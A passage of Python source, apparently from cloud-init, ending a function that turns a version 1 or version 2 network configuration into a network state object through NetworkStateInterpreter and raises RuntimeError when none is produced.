    :param skip_broken: passed through to the interpreter's parse_config()
    :param renderer: passed through to NetworkStateInterpreter
    :raises RuntimeError: if no network state could be produced
    """
    state = None
    version = net_config.get("version")
    config = net_config.get("config")
    if version == 2:
        # v2 does not have explicit 'config' key so we
        # pass the whole net-config as-is
        config = net_config

    if version and config is not None:
        nsi = NetworkStateInterpreter(
            version=version, config=config, renderer=renderer
        )
        nsi.parse_config(skip_broken=skip_broken)
        state = nsi.network_state

    if not state:
        raise RuntimeError(
            "No valid network_state object created from network config. "
            "Did you specify the correct version? Network config:\n"
            f"{net_config}"
        )

    return state
Close